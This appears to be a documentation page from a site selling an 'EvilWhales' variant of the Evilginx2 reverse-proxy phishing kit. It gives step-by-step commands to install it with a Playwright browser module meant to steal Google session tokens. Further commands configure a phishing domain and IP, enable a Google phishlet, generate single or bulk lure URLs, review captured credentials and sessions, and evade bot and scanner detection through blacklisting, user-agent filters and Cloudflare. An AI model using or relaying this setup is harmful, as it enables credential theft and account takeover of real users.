Installation Steps​

Installing and configuring the environment for Evilginx

Installation Steps​

Update Package Lists​ Begin by updating your system’s package lists to ensure you have the latest information on the newest versions of packages and their dependencies.

sudo apt-get update

Install xrandr​

xrandr is a utility for managing screen resolutions and display settings.

-- Use this option if you want to run Playwright with Xserver (for example, in MobaXterm) so you can view the browser live. -- If use "Headless: playwright.Bool(true)," do no need this to install.

sudo apt-get install x11-xserver-utils

Install Google Chrome

-- Use Chrome only if you choose not to use the browsers included in the Playwright app. In the source you received, you don’t need these installations.​

Download and install the latest stable version of Google Chrome.

wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
sudo dpkg -i google-chrome-stable_current_amd64.deb
sudo apt-get install -f # Install any missing dependencies

Install Go Programming Language

-- You will need to install the Go language, as the source code is in Go, and to compile it in Linux, you need Go installed.​

Go is essential for running Playwright-Go.

wget https://golang.org/dl/go1.20.7.linux-amd64.tar.gz
sudo rm -rf /usr/local/go
sudo tar -C /usr/local -xzf go1.20.7.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
go version

Install Playwright-Go and Dependencies

-- You need to install the Playwright Go library, as the Evilginx version for Google uses a module called EvilPlaywright. This module controls a real browser behind the reverse proxy to obtain certain tokens that otherwise cannot be retrieved correctly due to the different host in the reverse proxy or due to Google detecting browser incompatibilities with video versions, fonts, etc.​

Set up Playwright-Go, which is required for browser automation.

go get -u github.com/playwright-community/playwright-go
go run github.com/playwright-community/playwright-go/cmd/playwright@latest install --with-deps
go install github.com/playwright-community/playwright-go/cmd/playwright@latest
playwright install --with-dep

Starting Evilginx

To launch Evilginx2, execute the following command:

sudo /root/evilginx2/build/evilginx -p /root/evilginx2/phishlets -developer

[COLOR=rgb(250, 197, 28)]sudo [/COLOR] Runs the command with superuser (root) privileges, which are often necessary for network-related applications or services. /root/evilginx2/build/evilginx This is the path to the compiled Evilginx2 binary. Evilginx2 is a tool often used in phishing simulations or security testing to capture authentication tokens in real-time by acting as a reverse proxy. -p /root/evilginx2/phishlets Specifies the path where the phishlets are located. Phishlets are configuration files that define the behavior of Evilginx2 for specific websites or services (e.g., Google, Facebook). These phishlets contain rules for forwarding requests and capturing tokens and cookies. -developer: This allows for developer mode It does not use SSL from Evilginx with auto ssl using Let's Encrypt; instead, it will use the SSL settings provided by Cloudflare.

Adding a New Domain and Creating Lures Configure Your Domain:

  • config domain your-domain.com

  • Set Your Server's IPv4 Address:

  • config ipv4 103.114.163.58

Create and Enable a Phishlet:

  • phishlets hostname google your-domain.com

  • phishlets enable google

  • Create a New Lure:

  • lures create google

  • Retrieve the Lure URL:

  • lures get-url # Retrieves the current lure's URL

Advanced Configuration Note: all these commands are within the application, meaning they should be entered after the application has started and in the same window. Do not try the commands if you are not inside Evilginx.

Configuration Commands​ Manage and customize your Evilginx2 settings using the config command.

  • Display All Configuration Variables: config

  • Set Base Domain: config domain Example: config domain evilsite.com

  • Set External IPv4 Address: config ipv4 <ipv4_address> Example: zconfig ipv4 103.114.163.58

  • Set Binding IPv4 Address: config ipv4 bind <ipv4_address>

  • Change Unauthorized Redirect URL: config unauth_url

Phishlets Management Phishlets are templates used to create phishing scenarios. Manage them with the phishlets command.

  • Status of All Phishlets: phishlets

  • View Details of a Specific Phishlet: phishlets

  • Create a New Phishlet: phishlets create <child_name> <key1=value1> <key2=value2>

  • Delete a Phishlet: phishlets delete

  • Set Hostname for a Phishlet: phishlets hostname Example: phishlets hostname google evilsite.com

  • Override Unauthorized URL for a Phishlet: phishlets unauth_url

  • Enable a Phishlet: phishlets enable

  • Disable a Phishlet: phishlets disable

  • Hide a Phishlet: phishlets hide

  • Unhide a Phishlet: phishlets unhide

  • Generate Hosts File Entries for Testing: phishlets get-hosts

Lures Management​ Lures are specific phishing links created from phishlets. Manage them using the lures command.

  • All Created Lures: lures

  • View Details of a Specific Lure: lures

  • Create a New Lure: lures create

  • Delete a Specific Lure: lures delete

  • Delete All Lures: lures delete all

  • Generate a Phishing URL for a Lure: lures get-url <key1=value1> <key2=value2>

  • Generate Multiple Phishing URLs with Parameters: lures get-url import <params_file> export <urls_file> <text|csv|json>

  • Edit Lure Hostname: lures edit hostname

  • Edit Lure Path: lures edit path

  • Set HTML Redirector Directory for a Lure: lures edit redirector

  • Set User-Agent Filter for a Lure: lures edit ua_filter

  • Set Redirect URL After Successful Authorization: lures edit redirect_url <redirect_url>

Sessions Management​ Manage captured credentials and authentication tokens using the sessions command. -- In other words, here you can see the logs you’ve captured, as well as the traffic. The empty entries are just accesses.

  • History of All Logged Visits and Captured Credentials: sessions

  • View Details of a Specific Session: sessions

  • Delete a Specific Session: sessions delete

  • Delete Multiple Sessions: sessions delete <id_range> Example: sessions delete 1-7,10-12,15-25

  • Delete All Sessions: sessions delete all

Proxy Configuration​ Configure a proxy to route connections to remote websites using the proxy command.

  • All Proxy Configuration Variables: proxy

  • Enable Proxy: proxy enable

  • Disable Proxy: proxy disable

  • Set Proxy Type (Options: http, https, socks5, socks5h): proxy type Example: proxy type socks5

  • Set Proxy Address: proxy address

  • Set Proxy Port: proxy port

  • Set Proxy Username (for Authentication): proxy username

  • Set Proxy Password (for Authentication): proxy password

Blacklist Configuration​ Manage IP address blacklisting based on request types using the blacklist command.

  • Current Blacklisting Mode: blacklist

  • Blacklist All IP Addresses for Every Request: blacklist all

  • Blacklist IP Addresses Only for Unauthorized Requests: blacklist unauth

  • Blacklist IP Addresses Without Adding to the Blacklist: blacklist noadd

  • Disable Blacklisting (Allow All Requests): blacklist off

  • Enable or Disable Logging for Blacklist Messages: blacklist log <on|off> Example: blacklist log on

  • Set up a Cloudflare account to filter bots and sort traffic by country.

PreviousWelcome Evilginx Lab by [EvilWhales]NextOur Mods Evilginx X EvilWhales

Last updated

Was this helpful?